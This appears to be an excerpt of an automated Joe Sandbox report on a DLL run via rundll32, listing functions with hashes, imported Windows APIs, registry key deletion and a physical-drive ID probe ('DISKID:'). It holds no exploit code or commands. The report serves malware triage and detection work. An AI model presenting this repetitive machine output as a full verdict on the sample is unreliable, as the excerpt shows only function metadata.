Opcode ID: bc717a641c4b40965a7539f697593fdcfd2d1c84f3e9c21b72f2d4563acd1e4c
Instruction ID: 78dc16aea02112adc5142b529c93f8ef24449392eecf0550c8dd20f0597382ad
Opcode Fuzzy Hash: bc717a641c4b40965a7539f697593fdcfd2d1c84f3e9c21b72f2d4563acd1e4c
Instruction Fuzzy Hash: C251893BA00B9089E702CF65A8413DD7BB8F309B9CF1A9149EF9517B49CB30C60AC360

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072146 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180072156
wcstol.MSVCRT ref: 0000000180072185
_errno.MSVCRT ref: 0000000180072197
free.MSVCRT ref: 00000001800723C6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$freewcstol
String ID:
API String ID: 1017142431-0
Opcode ID: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
Instruction ID: ea2c5121f7eb01e98f314e31e7cc383447851c7166ff6db358424aa6cc9ed06f
Opcode Fuzzy Hash: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
Instruction Fuzzy Hash: C351683264478886EBA68F26A1403AE33E5F7597D8F008115FF9907798CF3ADA59CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180071286 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180071292
wcstol.MSVCRT ref: 00000001800712C1
_errno.MSVCRT ref: 00000001800712D3
free.MSVCRT ref: 000000018007157D

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$freewcstol
String ID:
API String ID: 1017142431-0
Opcode ID: 91753a2b24579f809c59a7839bbf57d4aaec203e4d39ef9f43d9a770c5dee1b2
Instruction ID: be79dc67c6c354923b804fe5f8ad9b59a21627c827f8274b8046453acc0eb7fe
Opcode Fuzzy Hash: 91753a2b24579f809c59a7839bbf57d4aaec203e4d39ef9f43d9a770c5dee1b2
Instruction Fuzzy Hash: 0C4160326047988AEBAA8F1AA0403EE73A5F7887D5F108115FF99477D9CF3AD655CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072242 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 000000018007224E
wcstol.MSVCRT ref: 000000018007227D
_errno.MSVCRT ref: 000000018007228F
free.MSVCRT ref: 00000001800723C6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$freewcstol
String ID:
API String ID: 1017142431-0
Opcode ID: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
Instruction ID: b35714efefb3a3022de44867f37344a12698415f3c6fa059f944579b3902dd1a
Opcode Fuzzy Hash: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
Instruction Fuzzy Hash: AE415A7264478886EBB68F2594503EE37A1F7597E8F008115FF5807798CF3EDA5A8B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000ADF4 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 000000018000AE88
GetLastError.KERNEL32 ref: 000000018000AE9A
WideCharToMultiByte.KERNEL32 ref: 000000018000AEC4
WideCharToMultiByte.KERNEL32 ref: 000000018000AEFA

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
Instruction ID: bae3b3959ef39ef5daeeababb2c60870945ab1ace41e6c98233782fb8fc2ea52
Opcode Fuzzy Hash: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
Instruction Fuzzy Hash: 9B31D272604B8482E764CF56B88074AB7A8F79DBD0F548628AFD947BA5CF38C645C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006C200 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 000000018006A2B8: malloc.MSVCRT(?,?,?,0000000180069638), ref: 000000018006DF0A
Part of subcall function 000000018006A2B8: SetLastError.KERNEL32(?,?,?,0000000180069638), ref: 000000018006DF1B

Part of subcall function 000000018006A32C: CreateFileA.KERNEL32 ref: 000000018006A363

memset.MSVCRT ref: 000000018006C2AB

Part of subcall function 000000018006A2C8: DeviceIoControl.KERNEL32 ref: 000000018006A2F1

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000400,?,00000000,00002000,00000000,000000018006C06D), ref: 000000018006C308

Part of subcall function 000000018006BD88: memmove.MSVCRT ref: 000000018006BDDE

Strings

\\.\PhysicalDrive%d, xrefs: 000000018006C25A
DISKID:, xrefs: 000000018006C2EC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CloseControlCreateDeviceErrorFileHandleLastmallocmemmovememset
String ID: DISKID:$\\.\PhysicalDrive%d
API String ID: 1541746987-3765948602
Opcode ID: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
Instruction ID: 026b1f04e6263926176f9cf333c98f43658e4a5f02bea82afa83b16206533a48
Opcode Fuzzy Hash: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
Instruction Fuzzy Hash: D831063220474542FBA29B66AC00BEA7392F789BD4F608121BE5947795DF3CC749CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E200 Relevance: 6.1, APIs: 4, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyW.ADVAPI32 ref: 000000018001E242
RegDeleteKeyW.ADVAPI32 ref: 000000018001E265
RegDeleteKeyW.ADVAPI32 ref: 000000018001E293
RegDeleteKeyW.ADVAPI32 ref: 000000018001E2B6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Delete
String ID:
API String ID: 1035893169-0
Opcode ID: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
Instruction ID: 40b5deca117a7cefaab46096add2d716b918ff16b730c8479b301d173d09ace7
Opcode Fuzzy Hash: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
Instruction Fuzzy Hash: 44219031705E8840FBAADBA2991079D6299BB4EFC0F1DC525FD2A437D4DE38C7488311

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000136C Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180001386
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000000180001394
GetLastError.KERNEL32 ref: 000000018000139E
InitializeCriticalSection.KERNEL32 ref: 000000018000145F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalInitializeSection$CountErrorLastSpinmemset
String ID:
API String ID: 3637577767-0
Opcode ID: 7d90deead172f80c17223e4fafcbbf4c21f3a15fc56382854b34721b20ae6022
Instruction ID: ef4c7ed201465567351dd9e07388d3240b1ef5216baed700a57e94c047b35caf
Opcode Fuzzy Hash: 7d90deead172f80c17223e4fafcbbf4c21f3a15fc56382854b34721b20ae6022
Instruction Fuzzy Hash: 74213D30602B0991EA96DB24AC553D933A0BF8D7A5F508629A66E473B1EE38C75DC321

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800324A4 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI ref: 00000001800324C4

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 000000018003251C
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003252F
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032542

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocFileFindNamePath
String ID:
API String ID: 772211780-0
Opcode ID: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
Instruction ID: 2d82027f7e94cb9bcb22be17a4537bea80464cdcc919518384ddf93808e552b3
Opcode Fuzzy Hash: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
Instruction Fuzzy Hash: 0521C432611E4482EB529F29D85039EB3A0FB89BF4F198711EA794B6E8DF7CC2448700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180032A90 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI ref: 0000000180032AB3

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032B0B
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032B1E
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032B31

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocFileFindNamePath
String ID:
API String ID: 772211780-0
Opcode ID: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
Instruction ID: 283ffb4ef057f0283fd59c714cbfe65b47d72467c2882de283dc062303e29699
Opcode Fuzzy Hash: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
Instruction Fuzzy Hash: 1221B832611A4482EB92DF29D84439EB3A0FB89BF4F198725E779476E9DF7CC6448700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180033068 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI ref: 0000000180033088

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 00000001800330E0
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800330F3
??3@YAXPEAX@Z.MSVCRT ref: 0000000180033106

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocFileFindNamePath
String ID:
API String ID: 772211780-0
Opcode ID: 307ce0f3569f6860fa341fe80190f4157af3b04d29387ea8d5fe3f277a62001a
Instruction ID: d9e03fda3b1d153f0bd4bb02b331d59468f410aa3c35072f5ffbfd31d5bd1a6e
Opcode Fuzzy Hash: 307ce0f3569f6860fa341fe80190f4157af3b04d29387ea8d5fe3f277a62001a
Instruction Fuzzy Hash: CD21D632601A4482EB568F29D89139EB3A0FB88BF4F198715EA79476E8DF7CC644C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C614 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000000018003C62A
malloc.MSVCRT(?,?,?,00000001800188EE), ref: 000000018003C663
free.MSVCRT(?,?,?,00000001800188EE), ref: 000000018003C6B1
GetTickCount.KERNEL32 ref: 000000018003C6B7

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CountTick$freemalloc
String ID:
API String ID: 112427268-0
Opcode ID: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
Instruction ID: b8918b2958dc72fb2df8bfc42f6eb5cd02d312beeb31fdbe44136919b98f9138
Opcode Fuzzy Hash: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
Instruction Fuzzy Hash: 3021517261560987EFD78B24EC85BAF23A0B74C7C0F42E024F95682695DF38D75D8B02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001AF10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000018001AF4B
EnterCriticalSection.KERNEL32 ref: 000000018001AF6C
LeaveCriticalSection.KERNEL32 ref: 000000018001AFB5

Part of subcall function 0000000180065438: InitializeCriticalSection.KERNEL32 ref: 000000018006552A

DeleteCriticalSection.KERNEL32 ref: 000000018001AFE6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Initialize$DeleteEnterLeave
String ID:
API String ID: 3345835275-0
Opcode ID: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
Instruction ID: bac7ba2d50b8a8327d60b40396a6a413962eafb144c30abffe047fc5a4d1e144
Opcode Fuzzy Hash: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
Instruction Fuzzy Hash: 51212970605A4896FBD29F50EC543D873A8F74EBE4F588229EAA9062A5DF39C74DC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070910 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 000000018007093E
_msize.MSVCRT ref: 0000000180070965
realloc.MSVCRT ref: 000000018007097B
memset.MSVCRT ref: 0000000180070999

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno_msizememsetrealloc
String ID:
API String ID: 1716158884-0
Opcode ID: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
Instruction ID: eee6de8c671426a850027d5845b58404d35e5bb09185fe1037511193ebe898ed
Opcode Fuzzy Hash: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
Instruction Fuzzy Hash: 7201A536715648C1F9869B27A4043D99251AB8CBE0F1DD720BF6A07BCBDE3DC6418700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018007F080 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 000000018007F0A2
memmove.MSVCRT(?,?,00000072,000000018007DC56), ref: 000000018007F0D7
memset.MSVCRT ref: 000000018007F0F3
_errno.MSVCRT ref: 000000018007F102

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$memmovememset
String ID:
API String ID: 390474681-0
Opcode ID: 34773165fa903b58a8169a26407c6ce6a53d95ed58fc80f98c13fe875aa60091
Instruction ID: 14b1c1fe1981e25254dae316b1258392d266da5cf9c387dbe4ce1a9d85b7c1af
Opcode Fuzzy Hash: 34773165fa903b58a8169a26407c6ce6a53d95ed58fc80f98c13fe875aa60091
Instruction Fuzzy Hash: 2401D631B1469C42FAE66B56F0003EE5250AB8CBD0F48D020BF4557B8FCE2ECA968740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180064710 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180064746
FreeLibrary.KERNEL32 ref: 000000018006477F
LeaveCriticalSection.KERNEL32 ref: 0000000180064793
DeleteCriticalSection.KERNEL32 ref: 000000018006479D

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$DeleteEnterFreeLeaveLibrary
String ID:
API String ID: 2347899730-0
Opcode ID: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
Instruction ID: 48e8189d87aa0b979fc36c7d6fe6748a55851d8ea4777fada0444d8c8a940578
Opcode Fuzzy Hash: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
Instruction Fuzzy Hash: 6E117033605B4897EB558F21E9443A97360FB4A7B5F1897249B690BAA0CF78D2798300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A900 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,000000018006A78C,00000000,00000008,00000000,000000018006AA37), ref: 000000018006A91E
_swprintf_c_l.LIBCMT ref: 000000018006A93A
ReadFile.KERNEL32 ref: 000000018006A955
_swprintf_c_l.LIBCMT ref: 000000018006A974

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: File_swprintf_c_l$PointerRead
String ID:
API String ID: 1259558433-0
Opcode ID: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
Instruction ID: 41788915f12d7117270c0c242483de8f49aba279d1603b6e07884f1d05f749b7
Opcode Fuzzy Hash: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
Instruction Fuzzy Hash: 9B01F53172864881F7929B61AC407DBA3A1F74D7C4F65C022FA5543A64CF3DC748CB20

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001A3F0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

??_U@YAPEAX_K@Z.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A413
memmove.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A426
??_U@YAPEAX_K@Z.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A43F
memmove.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A452

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

